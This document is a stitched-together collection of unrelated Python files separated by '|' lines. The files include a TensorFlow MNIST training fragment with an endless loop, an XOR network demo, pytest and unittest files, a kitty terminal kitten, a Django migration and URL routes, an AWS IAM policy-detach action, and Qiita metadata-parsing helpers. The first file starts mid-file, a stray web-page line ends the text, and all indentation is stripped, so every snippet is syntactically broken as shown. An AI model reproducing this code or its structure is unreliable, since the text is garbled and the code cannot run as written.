W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = -tf.reduce_sum(y_ * tf.log(y))
train_step = tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy)
obj_var = tf.reduce_min(tf.abs(y))
# Test trained model
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train
tf.train.write_graph(sess.graph_def, '/data/scripts/study_case/pbtxt_files', 'SOIPS14.pbtxt')
tf.initialize_all_variables().run()
batch_size = 205
'''inserted code'''
from scripts.utils.tf_utils import TensorFlowScheduler
scheduler = TensorFlowScheduler(name="soips14")
'''inserted code'''
while True:
batch_xs, batch_ys = mnist.train.next_batch(205)
loss = sess.run(cross_entropy, feed_dict={x: batch_xs, y_: batch_ys})
'''inserted code'''
scheduler.loss_checker(loss)
'''inserted code'''
sess.run(train_step,feed_dict={x: batch_xs, y_: batch_ys})
'''inserted code'''
scheduler.check_time()
'''inserted code'''
|
"""
This is the main, runnable .py script for the xor-problem
"""
from nn import NN
from optimizer import ADAM
from loss import cross_entropy_loss
from batching import MiniBatcher
import numpy as np
import matplotlib.pyplot as plt
import os
savefig_location = os.path.join(os.path.dirname(__file__), 'media')
train_samples = np.array([
[0, 0],
[0, 1],
[1, 0],
[1, 1]
])
train_labels = np.array([0, 1, 1, 0])
# Initializing our neural networl and ADAM classes
nn = NN(input_length=2, n_hidden_units=10, n_outputs=2, seed=1111)
adam = ADAM(layer_dims=nn.layer_dims, alpha=0.01, beta_m=0.99, beta_v=0.999, epsilon=0.00001)
mb = MiniBatcher(data=train_samples, labels=train_labels, batch_size=4, seed=111)
# Running our training loop for 300 epochs with the entirety of our training data at each batch
# We'll also be keeping track of our loss at each step...
historical_losses = list()
EPOCHS = 300
epoch_counter = 0
while epoch_counter < EPOCHS:
# Grabbing a mini-batch
X_mb, y_mb = mb.fetch_minibatch()
# Explicit check to see if we have run out of data
# If so, increment the epoch and reset the MiniBatcher
if isinstance(X_mb, bool):
epoch_counter += 1
mb.new_epoch()
X_mb, y_mb = mb.fetch_minibatch()
output = nn.forward_pass(input=X_mb)
sm_output = nn.softmax(input=output)
loss = cross_entropy_loss(y_pred=sm_output, y_actual=y_mb)
grad = nn.get_gradient(input=X_mb, y_pred=sm_output, y_actual=y_mb)
adam.update_weights(weights=nn.weights, gradient=grad)
historical_losses.append(loss)
# Our final prediction...
y_pred = nn.softmax(nn.forward_pass(input=train_samples))
print(f'Trained network predictions: {np.argmax(y_pred, axis=1)}')
print(f'Ground-truth values: {train_labels}')
if np.array_equal(np.argmax(y_pred, axis=1), train_labels):
print('Congrats, your network has solved the XOR problem!')
else:
print('Looks like your network is not quite there... Try more epochs.')
# Converting the historical_loss list into a plot...
plt.plot(historical_losses)
plt.xlabel('Epoch')
plt.ylabel('Cross-entropy loss')
plt.title('Loss per training epoch')
plt.savefig(savefig_location + '/xor_loss.png', dpi=400)
|
import pytest
from sklearn.datasets import load_iris, make_regression
from Amplo.AutoML import DataExplorer
from tests import rmtree
@pytest.fixture(scope='class', params=['classification', 'regression'])
def make_mode(request):
mode = request.param
if mode == 'classification':
x, y = load_iris(return_X_y=True, as_frame=True)
elif mode == 'regression':
# Interesting enough, the regression test for `test_explorer` ends up in a deadlock,
# specifically in the `DataExplorer.shap()` method. It's even more interesting that
# the california housing dataset works fine when using `unittest`
# x, y = fetch_california_housing(return_X_y=True, as_frame=True)
x, y = make_regression()
else:
raise NotImplementedError('Invalid mode')
request.cls.x = x
request.cls.y = y
request.cls.mode = mode
yield
@pytest.mark.usefixtures('make_mode')
class TestDataExploring:
def test_explorer(self):
tmp_folder = 'tmp/'
eda = DataExplorer(self.x, y=self.y, mode=self.mode, folder=tmp_folder)
eda.run()
rmtree(tmp_folder)
# class TestDataExploring(unittest.TestCase):
#
# @classmethod
# def setUpClass(cls):
# cls.class_x, cls.class_y = load_iris(return_X_y=True, as_frame=True)
# cls.reg_x, cls.reg_y = fetch_california_housing(return_X_y=True)
#
# def test_regression(self):
# eda = DataExplorer(self.reg_x, y=self.reg_y, mode='regression', folder='tmp/')
# eda.run()
# rmtree('tmp/')
#
# def test_classification(self):
# eda = DataExplorer(self.class_x, y=self.class_y, mode='classification', folder='tmp/')
# eda.run()
# rmtree('tmp/')
|
from kittens.tui.handler import result_handler
import os
def main(args):
pass
@result_handler(no_ui=True)
def handle_result(args, result, target_window_id, boss):
window_title = "vimjupyter"
jupyter_cmd = "jupyter"
cwd = args[1].replace(" ","\\ ")
cmd = f"cd {cwd}; {jupyter_cmd} console"
# Runs a command in the window
def run_cmd(window):
boss.child_monitor.needs_write(window.id, cmd + "\x0d")
# Try to find an existing pdf window
windows = list(boss.match_windows("title:" + window_title))
if len(windows) > 0:
for window in windows:
# Here we want to make sure we either reload the file, or open the new path
# If we have found one then check if there is a pdf already open
fg_cmd = " ".join(window.child.foreground_cmdline)
if cmd in fg_cmd:
# There is a jupyter.py running, but with a different doc
# Send safe quit
boss.child_monitor.needs_write(window.id, "q")
# boss.child_monitor.needs_write(window.id, "\x03")
# Open the pdf
run_cmd(window)
else:
# If there wasn't one open then make sure we send sigterm to clear input
# boss.child_monitor.needs_write(window.id, "\x03")
# Open the pdf
run_cmd(window)
return f"{cmd}, {fg_cmd}, {str(windows)}"
# If there isn't a window open, check that there is an active tab
tab = boss.active_tab
if tab is None:
return
# Switch the layout to splits, because we want to open the pdf to the right
tab.goto_layout("tall")
# Store the currently active window
active_window = tab.active_window
# Create the new window
window = tab.new_window(override_title=window_title, location="vsplit")
# Write the jupyter.py command
run_cmd(window)
# Switch the active window back to what it was
boss.set_active_window(active_window)
return cmd
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-29 12:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djangovirtualpos', '0009_vpsrefundoperation'),
]
operations = [
migrations.RemoveField(
model_name='vposrefundoperation',
name='confirmation_code',
),
migrations.AlterField(
model_name='vposrefundoperation',
name='status',
field=models.CharField(choices=[('pending', 'Pending'), ('completed', 'Completed'), ('failed', 'Failed')], max_length=64, verbose_name='Estado de la devoluci\xf3n'),
),
]
|
from django.conf.urls import url
from django.conf.urls import include
from django.urls import path
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, 'hello-viewset')
router.register('signup', views.UserProfileViewSet)
router.register('login', views.LoginViewSet, 'login')
router.register('feed', views.UserProfileFeedViewSet)
router.register('education', views.CollegeViewSet)
router.register('work-experience', views.CompanyViewSet)
router.register('projects', views.ProjectViewSet)
router.register('interests', views.InterestViewSet)
router.register('skills', views.SkillViewSet)
router.register('achievements', views.AchievementViewSet)
router.register('certificates', views.CertificationViewSet)
router.register('about', views.AboutViewSet)
router.register('portfolio-update', views.PostPortfolioDetailsViewSet)
urlpatterns = [
url(r'^hello-view/<username>', views.HelloApiView.as_view()),
path("user/<username>", views.PortfolioViewSet.as_view(), name="portfolio_list"),
path("user/<username>/<int:pk>", views.PortfolioDetailViewSet.as_view(), name="portfolio_detail"),
url(r'', include(router.urls)),
]
|
"""
## iam_detach_policy
What it does: detach all entities that attached to policy
Usage: iam_detach_policy
Limitations: none
"""
import boto3
from botocore.exceptions import ClientError
def detach_policy_from_entity(iterator, policy_arn):
"""
iterates throw list of entities and detach the policy
"""
text_output = ''
for entity in iterator:
try:
entity.detach_policy(PolicyArn=policy_arn)
except ClientError as e:
text_output = "Unexpected error: %s \n" % e
return text_output
def run_action(session,rule,entity,params):
iam_resource = session.resource('iam')
policy_arn = entity['arn']
iam_policy = iam_resource.Policy(policy_arn)
# check if the policy attached to any entity
if iam_policy.attachment_count <= 0:
return f"The policy {policy_arn} is not attached to an entity"
# detach the policy from evey entity
text_output = ''
text_output += detach_policy_from_entity(iam_policy.attached_groups.all(), policy_arn)
text_output += detach_policy_from_entity(iam_policy.attached_roles.all(), policy_arn)
text_output += detach_policy_from_entity(iam_policy.attached_users.all(), policy_arn)
return text_output
|
import unittest
from getnet.services.customers import Customer, Address
sample = {
"seller_id": "6eb2412c-165a-41cd-b1d9-76c575d70a28",
"customer_id": "customer_21081826",
"first_name": "João",
"last_name": "da Silva",
"document_type": "CPF",
"document_number": "78075751159",
"birth_date": "1976-02-21",
"phone_number": "5551999887766",
"celphone_number": "5551999887766",
"email": "[email protected]",
"observation": "O cliente tem interesse no plano x.",
"address": {
"street": "Av. Brasil",
"number": "1000",
"complement": "Sala 1",
"district": "São Geraldo",
"city": "Porto Alegre",
"state": "RS",
"country": "Brasil",
"postal_code": "90230060",
},
}
class CustomerTest(unittest.TestCase):
def testAddressConversion(self):
data = sample.copy()
customer = Customer(**data)
self.assertIsInstance(customer.address, Address)
self.assertEqual(
customer.address.postal_code, data.get("address").get("postal_code")
)
if __name__ == "__main__":
unittest.main()
|
"""
zadeklaruj funkcje która zwraca błąd
"""
def blad():
return ValueError
print(blad())
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from collections import defaultdict
from future.utils import PY3, viewitems
from future.utils.six import StringIO
import pandas as pd
import numpy as np
import warnings
from skbio.io.util import open_file
from skbio.util import find_duplicates
from qiita_db.exceptions import (QiitaDBColumnError, QiitaDBWarning,
QiitaDBError, QiitaDBDuplicateHeaderError)
from .constants import CONTROLLED_COLS, NA_VALUES, TRUE_VALUES, FALSE_VALUES
if PY3:
from string import ascii_letters as letters, digits
else:
from string import letters, digits
def type_lookup(dtype):
"""Lookup function to transform from python type to SQL type
Parameters
----------
dtype : object
The python type
Returns
-------
str
The SQL type
"""
if dtype in [np.int8, np.int16, np.int32, np.int64]:
return 'integer'
elif dtype in [np.float16, np.float32, np.float64]:
return 'float8'
elif np.issubdtype(dtype, np.datetime64):
return 'timestamp'
elif dtype == np.bool:
return 'bool'
else:
return 'varchar'
def get_datatypes(metadata_map):
r"""Returns the datatype of each metadata_map column
Parameters
----------
metadata_map : DataFrame
The MetadataTemplate contents
Returns
-------
list of str
The SQL datatypes for each column, in column order
"""
return [type_lookup(dtype) for dtype in metadata_map.dtypes]
def cast_to_python(value):
"""Casts the value from numpy types to python types
Parameters
----------
value : object
The value to cast
Returns
-------
object
The input value casted to a python type
"""
if isinstance(value, np.generic):
value = np.asscalar(value)
return value
def as_python_types(metadata_map, headers):
r"""Converts the values of metadata_map pointed by headers from numpy types
to python types.
Psycopg2 does not support the numpy types, so we should cast them to the
closest python type
Parameters
----------
metadata_map : DataFrame
The MetadataTemplate contents
headers : list of str
The headers of the columns of metadata_map that needs to be converted
to a python type
Returns
-------
list of lists
The values of the columns in metadata_map pointed by headers cast to
python types.
"""
values = []
for h in headers:
# we explicitly check for cases when we have a datetime64 object
# because otherwise doing the isinstance check against np.generic fails
if isinstance(metadata_map[h].values[0], np.datetime64):
values.append(list(map(pd.to_datetime, metadata_map[h])))
elif isinstance(metadata_map[h].values[0], np.generic):
values.append(list(map(np.asscalar, metadata_map[h])))
else:
values.append(list(metadata_map[h]))
return values
def prefix_sample_names_with_id(md_template, study_id):
r"""prefix the sample_names in md_template with the study id
Parameters
----------
md_template : DataFrame
The metadata template to modify
study_id : int
The study to which the metadata belongs to
"""
# Get all the prefixes of the index, defined as any string before a '.'
prefixes = {idx.split('.', 1)[0] for idx in md_template.index}
# If the samples have been already prefixed with the study id, the prefixes
# set will contain only one element and it will be the str representation
# of the study id
if len(prefixes) == 1 and prefixes.pop() == str(study_id):
# The samples were already prefixed with the study id
warnings.warn("Sample names were already prefixed with the study id.",
QiitaDBWarning)
else:
# Create a new pandas series in which all the values are the study_id
# and it is indexed as the metadata template
study_ids = pd.Series([str(study_id)] * len(md_template.index),
index=md_template.index)
# Create a new column on the metadata template that includes the
# metadata template indexes prefixed with the study id
md_template['sample_name_with_id'] = (study_ids + '.' +
md_template.index.values)
md_template.index = md_template.sample_name_with_id
del md_template['sample_name_with_id']
# The original metadata template had the index column unnamed - remove
# the name of the index for consistency
md_template.index.name = None
def load_template_to_dataframe(fn, strip_whitespace=True, index='sample_name'):
"""Load a sample/prep template or a QIIME mapping file into a data frame
Parameters
----------
fn : str or file-like object
filename of the template to load, or an already open template file
strip_whitespace : bool, optional
Defaults to True. Whether or not to strip whitespace from values in the
input file
index : str, optional
Defaults to 'sample_name'. The index to use in the loaded information
Returns
-------
DataFrame
Pandas dataframe with the loaded information
Raises
------
ValueError
Empty file passed
QiitaDBColumnError
If the sample_name column is not present in the template.
If there's a value in one of the reserved columns that cannot be cast
to the needed type.
QiitaDBWarning
When columns are dropped because they have no content for any sample.
QiitaDBError
When non UTF-8 characters are found in the file.
QiitaDBDuplicateHeaderError
If duplicate columns are present in the template
Notes
-----
The index attribute of the DataFrame will be forced to be 'sample_name'
and will be cast to a string. Additionally rows that start with a '\t'
character will be ignored and columns that are empty will be removed. Empty
sample names will be removed from the DataFrame.
The following table describes the data type per column that will be
enforced in `fn`. Column names are case-insensitive but will be lowercased
on addition to the database.
+-----------------------+--------------+
| Column Name | Python Type |
+=======================+==============+
| sample_name | str |
+-----------------------+--------------+
| #SampleID | str |
+-----------------------+--------------+
| physical_location | str |
+-----------------------+--------------+
| has_physical_specimen | bool |
+-----------------------+--------------+
| has_extracted_data | bool |
+-----------------------+--------------+
| sample_type | str |
+-----------------------+--------------+
| host_subject_id | str |
+-----------------------+--------------+
| description | str |
+-----------------------+--------------+
| latitude | float |
+-----------------------+--------------+
| longitude | float |
+-----------------------+--------------+
"""
# Load in file lines
holdfile = None
with open_file(fn, mode='U') as f:
holdfile = f.readlines()
if not holdfile:
raise ValueError('Empty file passed!')
# Strip all values in the cells in the input file, if requested
if strip_whitespace:
for pos, line in enumerate(holdfile):
holdfile[pos] = '\t'.join(d.strip(" \r\x0b\x0c")
for d in line.split('\t'))
# get and clean the controlled columns
cols = holdfile[0].split('\t')
controlled_cols = {'sample_name'}
controlled_cols.update(CONTROLLED_COLS)
holdfile[0] = '\t'.join(c.lower() if c.lower() in controlled_cols else c
for c in cols)
if index == "#SampleID":
# We're going to parse a QIIME mapping file. We are going to first
# parse it with the QIIME function so we can remove the comments
# easily and make sure that QIIME will accept this as a mapping file
data, headers, comments = _parse_mapping_file(holdfile)
holdfile = ["%s\n" % '\t'.join(d) for d in data]
holdfile.insert(0, "%s\n" % '\t'.join(headers))
# The QIIME parser fixes the index and removes the #
index = 'SampleID'
# index_col:
# is set as False, otherwise it is cast as a float and we want a string
# keep_default:
# is set as False, to avoid inferring empty/NA values with the defaults
# that Pandas has.
# na_values:
# the values that should be considered as empty
# true_values:
# the values that should be considered "True" for boolean columns
# false_values:
# the values that should be considered "False" for boolean columns
# converters:
# ensure that sample names are not converted into any other types but
# strings and remove any trailing spaces. Don't let pandas try to guess
# the dtype of the other columns, force them to be a str.
# comment:
# using the tab character as "comment" we remove rows that are
# constituted only by delimiters i. e. empty rows.
try:
template = pd.read_csv(StringIO(''.join(holdfile)), sep='\t',
encoding='utf-8', infer_datetime_format=True,
keep_default_na=False, na_values=NA_VALUES,
true_values=TRUE_VALUES,
false_values=FALSE_VALUES,
parse_dates=True, index_col=False, comment='\t',
mangle_dupe_cols=False, converters={
index: lambda x: str(x).strip(),
# required sample template information
'physical_location': str,
'sample_type': str,
# collection_timestamp is not added here
'host_subject_id': str,
'description': str,
# common prep template information
'center_name': str,
'center_projct_name': str})
except UnicodeDecodeError:
# Find row number and col number for utf-8 encoding errors
headers = holdfile[0].strip().split('\t')
errors = defaultdict(list)
for row, line in enumerate(holdfile, 1):
for col, cell in enumerate(line.split('\t')):
try:
cell.encode('utf-8')
except UnicodeError:
errors[headers[col]].append(row)
lines = ['%s: row(s) %s' % (header, ', '.join(map(str, rows)))
for header, rows in viewitems(errors)]
raise QiitaDBError('Non UTF-8 characters found in columns:\n' +
'\n'.join(lines))
# Check that we don't have duplicate columns
if len(set(template.columns)) != len(template.columns):
raise QiitaDBDuplicateHeaderError(find_duplicates(template.columns))
# let pandas infer the dtypes of these columns, if the inference is
# not correct, then we have to raise an error
columns_to_dtype = [(['latitude', 'longitude'], (np.int, np.float),
'integer or decimal'),
(['has_physical_specimen', 'has_extracted_data'],
np.bool_, 'boolean')]
for columns, c_dtype, english_desc in columns_to_dtype:
for n in columns:
if n in template.columns and not all([isinstance(val, c_dtype)
for val in template[n]]):
raise QiitaDBColumnError("The '%s' column includes values "
"that cannot be cast into a %s "
"value " % (n, english_desc))
initial_columns = set(template.columns)
if index not in template.columns:
raise QiitaDBColumnError("The '%s' column is missing from "
"your template, this file cannot be parsed."
% index)
# remove rows that have no sample identifier but that may have other data
# in the rest of the columns
template.dropna(subset=[index], how='all', inplace=True)
# set the sample name as the index
template.set_index(index, inplace=True)
# it is not uncommon to find templates that have empty columns
template.dropna(how='all', axis=1, inplace=True)
initial_columns.remove(index)
dropped_cols = initial_columns - set(template.columns)
if dropped_cols:
warnings.warn('The following column(s) were removed from the template '
'because all their values are empty: '
'%s' % ', '.join(dropped_cols), QiitaDBWarning)
# Pandas represents data with np.nan rather than Nones, change it to None
# because psycopg2 knows that a None is a Null in SQL, while it doesn't
# know what to do with NaN
template = template.where((pd.notnull(template)), None)
return template
def get_invalid_sample_names(sample_names):
"""Get a list of sample names that are not QIIME compliant
Parameters
----------
sample_names : iterable
Iterable containing the sample names to check.
Returns
-------
list
List of str objects where each object is an invalid sample name.
References
----------
.. [1] QIIME File Types documentaiton:
http://qiime.org/documentation/file_formats.html#mapping-file-overview.
"""
# from the QIIME mapping file documentation
valid = set(letters+digits+'.')
inv = []
for s in sample_names:
if set(s) - valid:
inv.append(s)
return inv
def looks_like_qiime_mapping_file(fp):
"""Checks if the file looks like a QIIME mapping file
Parameters
----------
fp : str or file-like object
filepath to check if it looks like a QIIME mapping file
Returns
-------
bool
True if fp looks like a QIIME mapping file, false otherwise.
Notes
-----
This is not doing a validation of the QIIME mapping file. It simply checks
the first line in the file and it returns true if the line starts with
'#SampleID', since a sample/prep template will start with 'sample_name' or
some other different column.
"""
first_line = None
with open_file(fp, mode='U') as f:
first_line = f.readline()
if not first_line:
return False
first_col = first_line.split()[0]
return first_col == '#SampleID'
def _parse_mapping_file(lines, strip_quotes=True, suppress_stripping=False):
"""Parser for map file that relates samples to metadata.
Format: header line with fields
optionally other comment lines starting with #
tab-delimited fields
Parameters
----------
lines : iterable of str
The contents of the QIIME mapping file
strip_quotes : bool, optional
Defaults to true. If true, quotes are removed from the data
suppress_stripping : bool, optional
Defaults to false. If true, spaces are not stripped
Returns
-------
list of lists, list of str, list of str
The data in the mapping file, the headers and the comments
Raises
------
QiitaDBError
If there is any error parsing the mapping file
Notes
-----
This code has been ported from QIIME.
"""
if strip_quotes:
if suppress_stripping:
# remove quotes but not spaces
def strip_f(x):
return x.replace('"', '')
else:
# remove quotes and spaces
def strip_f(x):
return x.replace('"', '').strip()
else:
if suppress_stripping:
# don't remove quotes or spaces
def strip_f(x):
return x
else:
# remove spaces but not quotes
def strip_f(x):
return x.strip()
# Create lists to store the results
mapping_data = []
header = []
comments = []
# Begin iterating over lines
for line in lines:
line = strip_f(line)
if not line or (suppress_stripping and not line.strip()):
# skip blank lines when not stripping lines
continue
if line.startswith('#'):
line = line[1:]
if not header:
header = line.strip().split('\t')
else:
comments.append(line)
else:
# Will add empty string to empty fields
tmp_line = map(strip_f, line.split('\t'))
if len(tmp_line) < len(header):
tmp_line.extend([''] * (len(header) - len(tmp_line)))
mapping_data.append(tmp_line)
if not header:
raise QiitaDBError("No header line was found in mapping file.")
if not mapping_data:
raise QiitaDBError("No data found in mapping file.")
return mapping_data, header, comments
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.